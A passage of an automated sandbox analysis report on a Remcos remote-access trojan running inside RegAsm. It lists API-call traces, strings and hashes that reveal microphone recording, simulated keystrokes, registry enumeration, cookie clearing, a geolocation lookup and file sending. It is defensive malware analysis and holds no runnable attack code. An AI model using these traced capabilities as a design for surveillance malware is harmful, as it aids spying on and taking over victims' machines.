                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                  • waveInStart.WINMM ref: 00401CFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: dMG$|MG$PG
                                                  • API String ID: 1356121797-532278878
                                                  • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                  • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                  • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                  • __freea.LIBCMT ref: 00454083
                                                  • __freea.LIBCMT ref: 0045408F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 201697637-0
                                                  • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                  • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                  • _free.LIBCMT ref: 00445515
                                                  • _free.LIBCMT ref: 0044552E
                                                  • _free.LIBCMT ref: 00445560
                                                  • _free.LIBCMT ref: 00445569
                                                  • _free.LIBCMT ref: 00445575
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                  • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                  • String ID: PkG$XMG$NG$NG
                                                  • API String ID: 1649129571-3151166067
                                                  • Opcode ID: a429b817407b60a57ca8399c4041a7761809850493783fc7a0b3f41dc707f752
                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                  • Opcode Fuzzy Hash: a429b817407b60a57ca8399c4041a7761809850493783fc7a0b3f41dc707f752
                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                  • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                  • __freea.LIBCMT ref: 0044AEB0
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • __freea.LIBCMT ref: 0044AEB9
                                                  • __freea.LIBCMT ref: 0044AEDE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                  • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                  APIs
                                                  • SendInput.USER32 ref: 00419A25
                                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16_free
                                                  • String ID: a/p$am/pm$h{D
                                                  • API String ID: 2936374016-2303565833
                                                  • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                  • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                  APIs
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • _free.LIBCMT ref: 00444E87
                                                  • _free.LIBCMT ref: 00444E9E
                                                  • _free.LIBCMT ref: 00444EBD
                                                  • _free.LIBCMT ref: 00444ED8
                                                  • _free.LIBCMT ref: 00444EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID: KED
                                                  • API String ID: 3033488037-2133951994
                                                  • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                  • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]$xUG$TG
                                                  • API String ID: 3554306468-1165877943
                                                  • Opcode ID: 4010ce4c5e7b861f3456ebae9656c6ef2fa6e35e8f0dda585fb92aeaae03829d
                                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                  • Opcode Fuzzy Hash: 4010ce4c5e7b861f3456ebae9656c6ef2fa6e35e8f0dda585fb92aeaae03829d
                                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                  • __fassign.LIBCMT ref: 0044B514
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: xUG$NG$NG$TG
                                                  • API String ID: 3114080316-2811732169
                                                  • Opcode ID: 3e12fc3dd25856b9ecab2061d3a0a4691b4eaef5d102c7165cd28defd3cf10c6
                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                  • Opcode Fuzzy Hash: 3e12fc3dd25856b9ecab2061d3a0a4691b4eaef5d102c7165cd28defd3cf10c6
                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                  APIs
                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 37874593-122982132
                                                  • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                  • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                  APIs
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                  • API String ID: 1133728706-4073444585
                                                  • Opcode ID: 7c352b3585a634410ab9138d6cff2a21f89007fdd3bec834ca7dbc2ca3cb0abe
                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                  • Opcode Fuzzy Hash: 7c352b3585a634410ab9138d6cff2a21f89007fdd3bec834ca7dbc2ca3cb0abe
                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                  • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                  • Opcode Fuzzy Hash: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                  APIs
                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                  • _free.LIBCMT ref: 00450FC8
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450FD3
                                                  • _free.LIBCMT ref: 00450FDE
                                                  • _free.LIBCMT ref: 00451032
                                                  • _free.LIBCMT ref: 0045103D
                                                  • _free.LIBCMT ref: 00451048
                                                  • _free.LIBCMT ref: 00451053
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
